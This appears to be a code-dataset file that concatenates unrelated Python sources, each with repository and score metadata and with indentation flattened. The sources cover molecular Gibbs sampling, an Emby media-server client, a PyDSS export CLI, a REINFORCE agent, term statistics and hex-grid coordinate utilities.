torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.autograd.set_grad_enabled(False)
# Initialize chain
if substructure is not None:
init_smiles = substructure
elif not init_smiles:
path = '../data/zinc/train.txt'
with open(path, 'r') as f:
data = [line.strip("\r\n ").split()[0] for line in f]
init_smiles = rng.choice(data)
init_smiles = get_smiles_2D(get_mol(init_smiles))
x = get_mol(init_smiles)
if substructure is not None:
for atom in x.GetAtoms():
atom.SetAtomMapNum(42)
num_marked = x.GetNumAtoms()
def check_sub_intact(mol):
num_here = len([atom for atom in mol.GetAtoms() if atom.GetAtomMapNum() == 42])
if num_here == num_marked:
return True
else:
return False
else:
def check_sub_intact(mol):
return True
# Run chain
collected_x_tilde = []
collected_x = [init_smiles]
print('init_x: %s' % init_smiles)
num_steps_reconstruct_chain = []
num_steps_corrupt_chain = []
revisit_chain = []
transition_attempts_chain = []
for t in range(num_transitions):
transition_attempts = 0
while True:
actual_x_tilde, num_steps_corrupt = self._apply_corrupter(x, rng, check_sub_intact)
# Reconstruct
for _ in range(10):
# Attempt 10 possible reconstruction transitions from the given corruption.
transition_attempts += 1
potential_x, num_steps_reconstruct, revisit = self.reconstruct(actual_x_tilde)
if potential_x is not None and check_sub_intact(potential_x):
# If the proposed x is valid, record it, and move to next transition.
x = potential_x
break
else:
# If none of the proposed reconstructions are valid after 10 steps,
# we retry the entire transition (including sampling the corruption).
continue
# Break out of the loop to validate a single transition.
break
if (t + 1) % sample_freq == 0:
# Print current state
collected_x_tilde.append(get_smiles_2D(actual_x_tilde))
collected_x.append(get_smiles_2D(x))
num_steps_corrupt_chain.append(num_steps_corrupt)
num_steps_reconstruct_chain.append(num_steps_reconstruct)
revisit_chain.append(revisit)
transition_attempts_chain.append(transition_attempts)
print('Iteration: %i' % (t + 1))
print('x_tilde: %s, x: %s' % (get_smiles_2D(actual_x_tilde), get_smiles_2D(x)))
return SampleResult(
seed, self.expected_corruption_steps, collected_x, collected_x_tilde,
num_steps_corrupt_chain, num_steps_reconstruct_chain, transition_attempts_chain,
revisit_chain, {})
def save_result(result: SampleResult, parameters=None):
if parameters is None:
parameters = {}
path = parameters.get('output_path')
if path is None:
savedir = parameters.get('save_dir')
else:
savedir = os.path.dirname(path)
if savedir is None:
savedir = '../output/'
if path is None:
for i in range(1000):
path = os.path.join(savedir, 'result_{0}.pkl'.format(i))
if not os.path.exists(path):
break
else:
raise ValueError("All paths exist.")
os.makedirs(savedir, exist_ok=True)
result = result._replace(meta={
**result.meta,
'model_path': parameters.get('model_path', "Model path unknown.")
})
print('Saving result in path {0}'.format(os.path.abspath(path)))
with open(path, 'wb') as f:
pickle.dump(result, f, protocol=pickle.HIGHEST_PROTOCOL)
def main():
# Set rdkit logging level
lg = rdkit.RDLogger.logger()
lg.setLevel(rdkit.RDLogger.CRITICAL)
parser = argparse.ArgumentParser()
parser.add_argument('--model_path', default=None)
parser.add_argument('--seed', default=None, type=int)
parser.add_argument('--expected_corruption_steps', default=5, type=int)
parser.add_argument('--num_transitions', default=1000, type=int)
parser.add_argument('--sample_freq', default=1, type=int)
parser.add_argument('--substructure', default=None)
parser.add_argument('--device', default='cpu')
parser.add_argument('--save_dir', default=None)
args = parser.parse_args()
if not args.model_path:
raise ValueError('Please specify a model path.')
# Load model
action_encoder = ar.VocabInsertEncoder(canonical=True)
config = joint_network.JointClassificationNetworkConfiguration(
action_encoder.get_num_atom_insert_locations(),
action_encoder.num_insert_bond_locations,
hidden_size=384)
model = joint_network.JointClassificationNetwork(1, config)
model.load_state_dict(torch.load(args.model_path, map_location='cpu'))
device = torch.device(args.device)
model = model.to(device=device)
model.eval()
# Run chain
sampler = GibbsSampler(model, args.expected_corruption_steps, action_encoder, device)
result = sampler.run_chain(seed=args.seed, num_transitions=args.num_transitions, sample_freq=args.sample_freq, substructure=args.substructure)
save_result(result, vars(args))
if __name__ == '__main__':
main()
| 2.078125 | 2 |
scripts.py | mukherjeeakash/GestureRecognizer | 0 | 12760271 | import numpy as np
import tensorflow as tf
import os
graph_def = tf.GraphDef()
labels = ["0","1","2"]
# Import the TF graph
with tf.gfile.FastGFile("model.pb", 'rb') as f:
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')
# Create a list of labels.
with open("labels.txt", 'rt') as lf:
for l in lf:
labels.append(l.strip())
| 2.78125 | 3 |
build/lib/pyconfluent/__init__.py | newellp2019/pyconfluent | 0 | 12760272 | <filename>build/lib/pyconfluent/__init__.py
from .ksql import KSQL
from .schema_registry import SchemaRegistry | 1.046875 | 1 |
PyDSS/cli/export.py | JMorganUSU/PyDSS | 21 | 12760273 | <filename>PyDSS/cli/export.py
"""
CLI to export data from a PyDSS project
"""
import logging
import os
import sys
import click
from PyDSS.pydss_project import PyDssProject
from PyDSS.pydss_results import PyDssResults
from PyDSS.loggers import setup_logging
from PyDSS.utils.utils import get_cli_string
logger = logging.getLogger(__name__)
# TODO Make command to list scenarios.
@click.argument(
"project-path",
)
@click.option(
"-f", "--fmt",
default="csv",
help="Output file format (csv or h5)."
)
@click.option(
"-c", "--compress",
is_flag=True,
default=False,
show_default=True,
help="Compress output files.",
)
@click.option(
"-o", "--output-dir",
help="Output directory. Default is project exports directory.",
)
@click.option(
"--verbose",
is_flag=True,
default=False,
show_default=True,
help="Enable verbose log output."
)
@click.command()
def export(project_path, fmt="csv", compress=False, output_dir=None, verbose=False):
"""Export data from a PyDSS project."""
if not os.path.exists(project_path):
sys.exit(1)
filename = "pydss_export.log"
console_level = logging.INFO
file_level = logging.INFO
if verbose:
console_level = logging.DEBUG
file_level = logging.DEBUG
setup_logging(
"PyDSS",
filename=filename,
console_level=console_level,
file_level=file_level,
)
logger.info("CLI: [%s]", get_cli_string())
results = PyDssResults(project_path)
for scenario in results.scenarios:
scenario.export_data(output_dir, fmt=fmt, compress=compress)
| 2.75 | 3 |
pyemby/server.py | mezz64/pyEmby | 14 | 12760274 | <gh_stars>10-100
"""
pyemby.server
~~~~~~~~~~~~~~~~~~~~
Provides api for Emby server
Copyright (c) 2017-2021 <NAME> <https://github.com/mezz64>
Licensed under the MIT license.
"""
import logging
import json
import uuid
import asyncio
import aiohttp
import async_timeout
from pyemby.device import EmbyDevice
from pyemby.constants import (
__version__, DEFAULT_TIMEOUT, DEFAULT_HEADERS, API_URL, SOCKET_URL,
STATE_PAUSED, STATE_PLAYING, STATE_IDLE)
from pyemby.helpers import deprecated_name, clean_none_dict_values
_LOGGER = logging.getLogger(__name__)
"""
Some general project notes that don't fit anywhere else:
Emby api workflow:
Any command-style actions are completed through the http api, not websockets.
Websocket provides play start and play stop notifications by default.
Can request session updates via:
{"MessageType":"SessionsStart", "Data": "0,1500"}
{"MessageType":"SessionsStop", "Data": ""}
Http api and websocket connection are handled async,
everything else can be done with normal methods
"""
class EmbyServer(object):
"""Emby test."""
def __init__(self, host, api_key, port=8096, ssl=False, loop=None):
"""Initialize base class."""
self._host = host
self._api_key = api_key
self._port = port
self._ssl = ssl
self._sessions = None
self._devices = {}
_LOGGER.debug("pyEmby %s initializing new server at: %s",
__version__, host)
if loop is None:
_LOGGER.info("Creating our own event loop.")
self._event_loop = asyncio.new_event_loop()
self._own_loop = True
else:
_LOGGER.info("Latching onto an existing event loop.")
self._event_loop = loop
self._own_loop = False
asyncio.set_event_loop(self._event_loop)
# Enable for asyncio debug logging
# self._event_loop.set_debug(True)
self._api_id = uuid.getnode()
headers = DEFAULT_HEADERS.copy()
headers.update({'x-emby-authorization':
'MediaBrowser Client="pyEmby",'
'Device="HomeAssistant",'
'DeviceId="{}",'
'Version="{}"'.format(
self._api_id, __version__)})
conn = aiohttp.TCPConnector(verify_ssl=False)
self._api_session = aiohttp.ClientSession(
connector=conn, headers=headers, loop=self._event_loop)
self.wsck = None
# Callbacks
self._new_devices_callbacks = []
self._stale_devices_callbacks = []
self._update_callbacks = []
self._shutdown = False
self._registered = False
@property
def unique_id(self):
"""Return unique ID for connection to Emby."""
return self._api_id
@property
def api_key(self):
""" Return api key. """
return self._api_key
@property
@deprecated_name('get_sessions')
def sessions(self):
""" Return sessions json. """
return self._sessions
@property
def devices(self):
""" Return devices dictionary. """
return self._devices
def add_new_devices_callback(self, callback):
"""Register as callback for when new devices are added. """
self._new_devices_callbacks.append(callback)
_LOGGER.debug('Added new devices callback to %s', callback)
def _do_new_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._new_devices_callbacks:
_LOGGER.debug('Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_stale_devices_callback(self, callback):
"""Register as callback for when stale devices exist. """
self._stale_devices_callbacks.append(callback)
_LOGGER.debug('Added stale devices callback to %s', callback)
def _do_stale_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._stale_devices_callbacks:
_LOGGER.debug('Stale Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_update_callback(self, callback, device):
"""Register as callback for when a matching device changes."""
self._update_callbacks.append([callback, device])
_LOGGER.debug('Added update callback to %s on %s', callback, device)
def remove_update_callback(self, callback, device):
""" Remove a registered update callback. """
if [callback, device] in self._update_callbacks:
self._update_callbacks.remove([callback, device])
_LOGGER.debug('Removed update callback %s for %s',
callback, device)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, device in self._update_callbacks:
if device == msg:
_LOGGER.debug('Update callback %s for device %s by %s',
callback, device, msg)
self._event_loop.call_soon(callback, msg)
def start(self):
"""Public method for initiating connectivity with the emby server."""
asyncio.ensure_future(self.register(), loop=self._event_loop)
if self._own_loop:
_LOGGER.info("Starting up our own event loop.")
self._event_loop.run_forever()
self._event_loop.close()
_LOGGER.info("Connection shut down.")
async def stop(self):
"""Async method for stopping connectivity with the emby server."""
self._shutdown = True
if self.wsck:
_LOGGER.info('Closing Emby server websocket.')
await self.wsck.close()
self.wsck = None
if self._own_loop:
_LOGGER.info("Shutting down Emby server loop...")
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
def construct_url(self, style):
""" Return http/https or ws/wss url. """
if style is API_URL:
if self._ssl:
return 'https://{}:{}'.format(self._host, self._port)
else:
return 'http://{}:{}'.format(self._host, self._port)
elif style is SOCKET_URL:
if self._ssl:
return 'wss://{}:{}'.format(self._host, self._port)
else:
return 'ws://{}:{}'.format(self._host, self._port)
else:
return None
async def register(self):
"""Register library device id and get initial device list. """
url = '{}/Sessions'.format(self.construct_url(API_URL))
params = {'api_key': self._api_key}
reg = await self.api_request(url, params)
if reg is None:
self._registered = False
_LOGGER.error('Unable to register emby client.')
else:
self._registered = True
_LOGGER.info('Emby client registered!, Id: %s', self.unique_id)
self._sessions = clean_none_dict_values(reg)
# Build initial device list.
self.update_device_list(self._sessions)
asyncio.ensure_future(self.socket_connection(), loop=self._event_loop)
async def api_post(self, url, params):
"""Make api post request."""
post = None
try:
with async_timeout.timeout(DEFAULT_TIMEOUT):
post = await self._api_session.post(
url, params=params)
if post.status != 204:
_LOGGER.error('Error posting Emby data: %s', post.status)
return None
post_result = await post.text()
return post_result
except (aiohttp.ClientError, asyncio.TimeoutError,
ConnectionRefusedError) as err:
_LOGGER.error('Error posting Emby data: %s', err)
return None
async def api_request(self, url, params):
"""Make api fetch request."""
request = None
try:
with async_timeout.timeout(DEFAULT_TIMEOUT):
request = await self._api_session.get(
url, params=params)
if request.status != 200:
_LOGGER.error('Error fetching Emby data: %s', request.status)
return None
request_json = await request.json()
if 'error' in request_json:
_LOGGER.error('Error converting Emby data to json: %s: %s',
request_json['error']['code'],
request_json['error']['message'])
return None
return request_json
except (aiohttp.ClientError, asyncio.TimeoutError,
ConnectionRefusedError) as err:
_LOGGER.error('Error fetching Emby data: %s', err)
return None
async def socket_connection(self):
""" Open websocket connection. """
if not self._registered:
_LOGGER.error('Client not registered, cannot start socket.')
return
url = '{}?DeviceID={}&api_key={}'.format(
self.construct_url(SOCKET_URL), self._api_id, self._api_key)
fail_count = 0
while True:
_LOGGER.debug('Attempting Socket Connection.')
try:
with async_timeout.timeout(DEFAULT_TIMEOUT):
self.wsck = await self._api_session.ws_connect(url)
# Enable sever session updates:
try:
msg = await self.wsck.send_str(
'{"MessageType":"SessionsStart", "Data": "0,1500"}')
except Exception as err:
# Catch all for now
_LOGGER.error('Failure setting session updates: %s', err)
raise ValueError('Session updates error.')
_LOGGER.debug('Socket Connected!')
fail_count = 0
while True:
msg = await self.wsck.receive()
if msg.type == aiohttp.WSMsgType.text:
# Process data
self.process_msg(msg.data)
elif msg.type == aiohttp.WSMsgType.closed:
raise ValueError('Websocket was closed.')
elif msg.type == aiohttp.WSMsgType.error:
_LOGGER.debug(
'Websocket encountered an error: %s', msg)
raise ValueError('Websocket error.')
except (aiohttp.ClientError, asyncio.TimeoutError,
aiohttp.WSServerHandshakeError,
ConnectionRefusedError, OSError, ValueError) as err:
if not self._shutdown:
fail_count += 1
_LOGGER.debug('Websocket unintentionally closed.'
' Trying reconnect in %ss. Error: %s',
(fail_count * 5) + 5, err)
await asyncio.sleep(15, self._event_loop)
continue
else:
break
def process_msg(self, msg):
"""Process messages from the event stream."""
jmsg = json.loads(msg)
msgtype = jmsg['MessageType']
msgdata = jmsg['Data']
_LOGGER.debug('New websocket message recieved of type: %s', msgtype)
if msgtype == 'Sessions':
self._sessions = clean_none_dict_values(msgdata)
# Check for new devices and update as needed.
self.update_device_list(self._sessions)
"""
May process other message types in the future.
Other known types are:
- PlaybackStarted
- PlaybackStopped
- SessionEnded
"""
def update_device_list(self, sessions):
""" Update device list. """
if sessions is None:
_LOGGER.error('Error updating Emby devices.')
return
new_devices = []
active_devices = []
dev_update = False
for device in sessions:
dev_name = '{}.{}'.format(device['DeviceId'], device['Client'])
try:
_LOGGER.debug('Session msg on %s of type: %s, themeflag: %s',
dev_name, device['NowPlayingItem']['Type'],
device['NowPlayingItem']['IsThemeMedia'])
except KeyError:
pass
active_devices.append(dev_name)
if dev_name not in self._devices and \
device['DeviceId'] != str(self._api_id):
_LOGGER.debug('New Emby DeviceID: %s. Adding to device list.',
dev_name)
new = EmbyDevice(device, self)
self._devices[dev_name] = new
new_devices.append(new)
elif device['DeviceId'] != str(self._api_id):
# Before we send in new data check for changes to state
# to decide if we need to fire the update callback
if not self._devices[dev_name].is_active:
# Device wasn't active on the last update
# We need to fire a device callback to let subs now
dev_update = True
do_update = self.update_check(
self._devices[dev_name], device)
self._devices[dev_name].update_data(device)
self._devices[dev_name].set_active(True)
if dev_update:
self._do_new_devices_callback(0)
dev_update = False
if do_update:
self._do_update_callback(dev_name)
# Need to check for new inactive devices and flag
for dev_id in self._devices:
if dev_id not in active_devices:
# Device no longer active
if self._devices[dev_id].is_active:
self._devices[dev_id].set_active(False)
self._do_update_callback(dev_id)
self._do_stale_devices_callback(dev_id)
# Call device callback if new devices were found.
if new_devices:
self._do_new_devices_callback(0)
def update_check(self, existing, new):
""" Check device state to see if we need to fire the callback.
True if either state is 'Playing'
False if both states are: 'Paused', 'Idle', or 'Off'
True on any state transition.
"""
old_state = existing.state
if 'NowPlayingItem' in existing.session_raw:
try:
old_theme = existing.session_raw['NowPlayingItem']['IsThemeMedia']
except KeyError:
old_theme = False
else:
old_theme = False
if 'NowPlayingItem' in new:
if new['PlayState']['IsPaused']:
new_state = STATE_PAUSED
else:
new_state = STATE_PLAYING
try:
new_theme = new['NowPlayingItem']['IsThemeMedia']
except KeyError:
new_theme = False
else:
new_state = STATE_IDLE
new_theme = False
if old_theme or new_theme:
return False
elif old_state == STATE_PLAYING or new_state == STATE_PLAYING:
return True
elif old_state != new_state:
return True
else:
return False
def get_latest_items(self, user_id, limit=3, is_played='false',
include_item_types='episode'):
""" Get latest items by scheduling the worker method. """
if not self._registered:
_LOGGER.debug('Client not registered, cannot get items.')
return
def return_result(future):
""" Return result. """
return future.result()
run_coro = asyncio.ensure_future(self.async_get_latest_items(
user_id, limit, is_played, include_item_types),
loop=self._event_loop)
run_coro.add_done_callback(return_result)
async def async_get_latest_items(self, user_id, limit=3, is_played='false',
include_item_types='episode'):
""" Return XX most recent movie or episode additions to library"""
if not self._registered:
_LOGGER.debug('Client not registered, cannot get items.')
return
url = '{0}/Users/{1}/Items/Latest'.format(
self.construct_url(API_URL), user_id)
params = {'api_key': self._api_key,
'IncludeItemTypes': include_item_types,
'Limit': limit,
'IsPlayed': is_played}
items = await self.api_request(url, params)
if items is None:
_LOGGER.debug('Unable to fetch items.')
else:
return items
| 2.25 | 2 |
1-grid-world/7-reinforce/reinforce_agent.py | smbatchouAI/reinforcement-learning-1 | 1 | 12760275 | import copy
import pylab
import numpy as np
from environment import Env
from keras.layers import Dense
from keras.optimizers import Adam
from keras.models import Sequential
from keras import backend as K
EPISODES = 2500
class ReinforceAgent:
def __init__(self):
self.render = False
self.load_model = False
self.action_space = [0, 1, 2, 3, 4]
self.action_size = len(self.action_space)
self.state_size = 15
self.discount_factor = 0.99 # decay rate
self.learning_rate = 0.001
self.model = self.build_model()
self.optimizer = self.optimizer()
self.states, self.actions, self.rewards = [], [], []
if self.load_model:
self.model.load_weights('./save_model/reinforce_trained.h5')
def build_model(self):
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='softmax'))
model.summary()
return model
def optimizer(self):
action = K.placeholder(shape=[None, 5])
discounted_rewards = K.placeholder(shape=[None, ])
good_prob = K.sum(action * self.model.output, axis=1)
eligibility = K.log(good_prob) * K.stop_gradient(discounted_rewards)
loss = -K.sum(eligibility)
optimizer = Adam(lr=self.learning_rate)
updates = optimizer.get_updates(self.model.trainable_weights,[],
loss)
train = K.function([self.model.input, action, discounted_rewards], [],
updates=updates)
return train
def get_action(self, state):
policy = self.model.predict(state)[0]
return np.random.choice(self.action_size, 1, p=policy)[0]
def discount_rewards(self, rewards):
discounted_rewards = np.zeros_like(rewards)
running_add = 0
for t in reversed(range(0, len(rewards))):
running_add = running_add * self.discount_factor + rewards[t]
discounted_rewards[t] = running_add
return discounted_rewards
def remember_episode(self, state, action, reward):
self.states.append(state[0])
self.rewards.append(reward)
act = np.zeros(self.action_size)
act[action] = 1
self.actions.append(act)
def train_model(self):
discounted_rewards = np.float32(self.discount_rewards(self.rewards))
discounted_rewards -= np.mean(discounted_rewards)
discounted_rewards /= np.std(discounted_rewards)
self.optimizer([self.states, self.actions, discounted_rewards])
self.states, self.actions, self.rewards = [], [], []
if __name__ == "__main__":
env = Env()
agent = ReinforceAgent()
global_step = 0
scores, episodes = [], []
for e in range(EPISODES):
done = False
score = 0
state = env.reset()
state = np.reshape(state, [1, 15])
while not done:
if agent.render:
env.render()
global_step += 1
action = agent.get_action(state)
next_state, reward, done = env.step(action)
next_state = np.reshape(next_state, [1, 15])
agent.remember_episode(state, action, reward)
score += reward
state = copy.deepcopy(next_state)
if done:
agent.train_model()
scores.append(score)
episodes.append(e)
score = round(score,2)
print("episode:", e, " score:", score, " time_step:",
global_step)
if e % 100 == 0:
pylab.plot(episodes, scores, 'b')
pylab.savefig("./save_graph/reinforce.png")
agent.model.save_weights("./save_model/reinforce.h5")
if e == 501:
break
print('game over')
env.destroy()
| 2.390625 | 2 |
01/cli.py | hassaku63/argparse-get-started | 1 | 12760276 | <gh_stars>1-10
import argparse
def main():
"""argparse tutorial 1
https://docs.python.org/ja/3/howto/argparse.html
00をargparseで書き直してみる
"""
# https://docs.python.org/ja/3/library/argparse.html#argumentparser-objects
parser = argparse.ArgumentParser(
description="This is argparse tutorial - 01"
)
# コマンドラインパーサが受け付ける引数を定義する
# この例では -m <msg>, --message <msg> の形式で指定可能な引数を定義している
parser.add_argument(
"-m",
"--message",
type=str,
dest='msg',
default='world',
help="出力する文字列"
)
# 与えられた実行時の引数をパース
args = parser.parse_args()
# ロジック部分の処理
message = args.msg
print(f'hello, {message.upper()}')
if __name__ == '__main__':
main() | 3.84375 | 4 |
exercicios/Curso_em_video/ex032.py | IgoPereiraBarros/maratona-data-science-brasil | 0 | 12760277 | <reponame>IgoPereiraBarros/maratona-data-science-brasil
from datetime import date
from time import sleep
ano = int(input('Digite um ano para verificar se é Bissexto ou não, ou 0(zero) para verificar o ano atual: '))
print('Verificando...')
sleep(3)
if ano == 0:
ano = date.today().year
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('O ano {} é Bissexto'.format(ano))
else:
print('O ano {} não é Bissexto'.format(ano))
| 3.71875 | 4 |
biotermhub/stats/statistics_termfile.py | OntoGene/BioTermHub_dockerized | 1 | 12760278 | <reponame>OntoGene/BioTermHub_dockerized
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: <NAME>, 2015
# Modified: <NAME>, 2016
"""
Calculate term synonymy and ambiguity statistics.
"""
from collections import Counter, defaultdict
import csv
import re
from termhub.lib.tools import TSVDialect
class StatsCollector(object):
'''
Collector for ambiguity and synonymy statistics.
'''
def __init__(self, label, name):
self.label = label # eg. "Resource", "Entity Type"
self.name = name
self.terms = Counter()
# counts number of occurrences of term
# Key: term, Value: count
# included: calculate total number of terms (types) = length of terms
self.synonyms = defaultdict(set)
# counts number of synonyms for each id
# Key: ID, Value: set of terms
self.ambiguous_terms = defaultdict(set)
# counts ids per term type (how many different ids are associated with
# one term (types)?)
# Key: term, Value: set of ids
self.ambiguous_terms_lower = defaultdict(set)
# counts number of ids per term (unique) with all terms lowercased
# Key: Term, Value: set of ids
self.ambiguous_terms_nows = defaultdict(set)
# counts number of ids per terms (unique) with all terms lowercased
# and all non-alphanumeric chars removed
# Key: Term, Value: set of ids
@property
def ids(self):
'Set of all IDs.'
return set().union(*self.ambiguous_terms.values())
@classmethod
def strip_symbols(cls, term):
'''
Remove non-alphanumeric characters.
'''
return cls.nonalnum.sub('', term)
nonalnum = re.compile(r'[\W_]+')
def update(self, id_, term):
'''
Update all counters with this entry.
'''
term_lw = term.lower()
term_nws = self.strip_symbols(term_lw)
self.terms[term] += 1
self.ambiguous_terms[term].add(id_)
self.ambiguous_terms_lower[term_lw].add(id_)
self.ambiguous_terms_nows[term_nws].add(id_)
self.synonyms[id_].add(term)
def term_length_avg(self):
'''
Get the average term length.
'''
total_length = sum(len(term) for term in self.terms)
avg = total_length / len(self.terms)
return avg
def id_freq_dist(self):
'Terms per ID (synonymy).'
return freq_dist(self.synonyms)
def term_freq_dist(self):
'IDs per term (ambiguity).'
return freq_dist(self.ambiguous_terms)
def term_lw_freq_dist(self):
'IDs per lower-cased term (case-insensitive ambiguity).'
return freq_dist(self.ambiguous_terms_lower)
def term_lw_nows_freq_dist(self):
'IDs per lower-cased, alphanumeric-only term (normalised ambiguity).'
return freq_dist(self.ambiguous_terms_nows)
def display_stats(self):
'''
Dump a textual description to STDOUT.
'''
print('\n')
print(self.label, 'statistics for', self.name)
print('Number of original IDs:', len(self.ids))
print('Number or original terms:', len(self.terms))
print('Average of IDs associated to one term ("ambiguous terms"):',
average(self.ambiguous_terms))
print('Average of Terms associated to one ID ("synonyms"):',
average(self.synonyms))
print('FREQ DIST number of terms per id', self.id_freq_dist())
print('FREQ DIST number of ids per term', self.term_freq_dist())
print('FREQ DIST number of ids per lower-cased term',
self.term_lw_freq_dist())
print('FREQ DIST number or ids per lower-cased term with '
'non-alphanumeric characters removed',
self.term_lw_nows_freq_dist())
print('AVG Token Lenght', self.term_length_avg())
class OverallStats(StatsCollector):
'''
Collector for the whole combined resource.
'''
def __init__(self, label=None, name=None):
super().__init__(label, name)
# Total number of entries in the whole term file (tokens).
self.all_lines_counter = 0
self.substats = defaultdict(dict)
def update(self, id_, term, **kwargs):
self.all_lines_counter += 1
# Update subordinate stats.
for label, name in kwargs.items():
if name not in self.substats[label]:
self.substats[label][name] = StatsCollector(label, name)
self.substats[label][name].update(id_, term)
# Update global stats.
super().update(id_, term)
def display_stats(self):
print('\n')
print('STATS FOR WHOLE TERM FILE')
print('Number of lines/terms:', self.all_lines_counter)
print('Substats:')
for label, names in self.substats.values():
print(' {}:'.format(label), ', '.join(names))
print('Total number of unique terms (types) in the term file:',
len(self.terms))
print('Average of tokens per type:', average(self.terms))
print('Average of ids per term:', average(self.ambiguous_terms))
print('Average of ids per term with lowercased terms:',
average(self.ambiguous_terms_lower))
print('Average of ids per term with lowercased terms and non-'
'alphabetical characters removed:',
average(self.ambiguous_terms_nows))
print('FREQ DIST number of terms per id', self.id_freq_dist())
print('FREQ DIST number of ids per term', self.term_freq_dist())
print('FREQ DIST number of ids per term (terms are lowercased)',
self.term_lw_freq_dist())
print('FREQ DIST number of ids per term (terms are lowercased and '
'symbols are removed', self.term_lw_nows_freq_dist())
print('AVG Token Lenght', self.term_length_avg())
for label, names in self.substats.values():
print('-----------')
print(label, 'stats')
for substats in names.values():
substats.display_stats()
def freq_dist(coll):
'''
Frequency distribution.
'''
return Counter(len(v) for v in coll.values())
def average(coll):
'''
Compute mean or mean length of coll's values.
'''
try:
total_count = sum(coll.values())
except TypeError:
total_count = sum(len(v) for v in coll.values())
avg = total_count / len(coll)
return avg
def process_file(csv_file):
'''
Read a csv file and produce a list of dictionaries
with one dictionary per line using DictReader;
Headers are used as keys.
'''
# Generate proper header from first line
with open(csv_file, 'r') as infile:
reader = csv.DictReader(infile, dialect=TSVDialect)
overall_stats = OverallStats()
for row in reader:
overall_stats.update(row['original_id'],
row['term'],
Resource=row['resource'],
Entity_Type=row['entity_type'])
return overall_stats
| 2.453125 | 2 |
model/utilities/hex_util.py | lil-lab/cerealbar_generation | 0 | 12760279 | """Various utilities dealing with hex coordinates mapping onto tensors representing the environment.
See: https://arxiv.org/pdf/1803.02108.pdf
Authors: <NAME> and <NAME>
"""
import os
import time
import math
from dataclasses import dataclass
import torch
from agent.environment import position
from ..map_transformations import pose
from .. import util
from typing import Tuple
@dataclass
class AxialPosition:
# Axis indices
u: int
# Row indices
v: int
def __str__(self):
return '%s, %s' % (self.u, self.v)
def __hash__(self):
return (self.u, self.v).__hash__()
@dataclass
class CubePosition:
x: int
y: int
z: int
def offset_position_to_axial(offset_position: position.Position, add_u: int = 0, add_v: int = 0) -> AxialPosition:
"""Converts from offset coordinates to axial coordinates.
Inputs:
offset_position: Position in offset coordinates.
max_y: The maximum y-value for an environment, so that coordinates are not negative.
"""
u = offset_position.x - offset_position.y // 2
# V and Y are equivalent (rows).
return AxialPosition(u + add_u, offset_position.y + add_v)
def axial_position_to_offset(axial_position: AxialPosition, max_y: int = 0) -> position.Position:
"""Converts from axial to offset coordinates.
Inputs:
axial_position: Position in axial coordinates.
max_y: The maximum y-value for an environment, to account for offset in axial coordinates that comes from
avoiding negative u-values.
"""
x = axial_position.u + axial_position.v // 2 - max_y // 2
return position.Position(x, axial_position.v)
def axial_position_to_cube(axial_position: AxialPosition) -> CubePosition:
return CubePosition(axial_position.v, -(axial_position.u + axial_position.v), axial_position.u)
def cube_position_to_axial(cube_position: CubePosition) -> AxialPosition:
return AxialPosition(cube_position.z, cube_position.x)
def rotate_counterclockwise(axial_position: AxialPosition, u_offset: int = 0, v_offset: int = 0) -> AxialPosition:
axial_position = AxialPosition(axial_position.u - u_offset, axial_position.v - v_offset)
cube_position = axial_position_to_cube(axial_position)
rotated_cube = CubePosition(- cube_position.z, -cube_position.x, -cube_position.y)
rotated_axial = cube_position_to_axial(rotated_cube)
return AxialPosition(rotated_axial.u + u_offset, rotated_axial.v + v_offset)
def _get_batch_index_tensor(batch_size: int, env_height: int, env_width: int):
index_array = torch.tensor([i for i in range(batch_size)])
index_tensor = index_array.repeat(env_height, env_width, 1)
return index_tensor.permute(2,0,1).long().detach().to(util.DEVICE)
def _get_offset_index_tensor(env_height: int, env_width: int) -> torch.Tensor:
# Create a H x W x 2 matrix
q_col_indices = torch.linspace(0, env_width - 1, env_width)
r_row_indices = torch.linspace(0, env_height - 1, env_height)
q_cols, r_rows = torch.meshgrid([q_col_indices, r_row_indices])
return torch.stack((q_cols, r_rows)).permute(1, 2, 0).long().detach().to(util.DEVICE)
def _get_batched_offset_index_tensor(batch_size: int, env_height: int, env_width: int) -> torch.Tensor:
# Batch size could include the channel dimension.
index_tensor = _get_offset_index_tensor(env_height, env_width)
# Stack it
return index_tensor.unsqueeze(0).repeat(batch_size, 1, 1, 1).detach().to(util.DEVICE)
def _get_axial_index_tensor(offset_index_tensor: torch.Tensor,
add_u: int = 0, add_v: int = 0) -> torch.Tensor:
# The offset index tensor is assumed to be of size B x H x W x 2, where B is the batch size (or batch size x
# channel dimension).
if offset_index_tensor.size(3) != 2:
raise ValueError('Offset index tensor should have size B x H x W x 2: %s' % offset_index_tensor.size())
# v is just the same as r.
v = offset_index_tensor[:, :, :, 1]
# u is the axis index. It is q - r // 2.
u = offset_index_tensor[:, :, :, 0] - v // 2
# Add the offsets.
u += add_u
v += add_v
if (u < 0).any():
print(u)
raise ValueError('Axial index tensor has u negative values. Perhaps you need to add u.')
if (v < 0).any():
print(v)
raise ValueError('Axial index tensor has v negative values. Perhaps you need to add v.')
return torch.stack((u, v)).permute(1, 2, 3, 0).long()
def _get_cube_index_tensor(axial_index_tensor: torch.Tensor,
add_u: int = 0, add_v: int = 0) -> torch.Tensor:
# The offset index tensor is assumed to be of size B x H x W x 2, where B is the batch size (or batch size x
# channel dimension).
if axial_index_tensor.size(3) != 2:
raise ValueError('Axial index tensor should have size B x H x W x 2: %s' % axial_index_tensor.size())
u = axial_index_tensor[:, :, :, 0]
v = axial_index_tensor[:, :, :, 1]
# x is just the same as v.
x = v
# y is -(u + v).
y = -(u + v)
# z is just the same as u.
z = u
return torch.stack((x, y, z)).permute(1, 2, 3, 0).long()
def _get_offset_axial_indices(batch_size: int, height: int, width: int,
additional_size: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
offset_index_tensor = _get_batched_offset_index_tensor(batch_size, height, width)
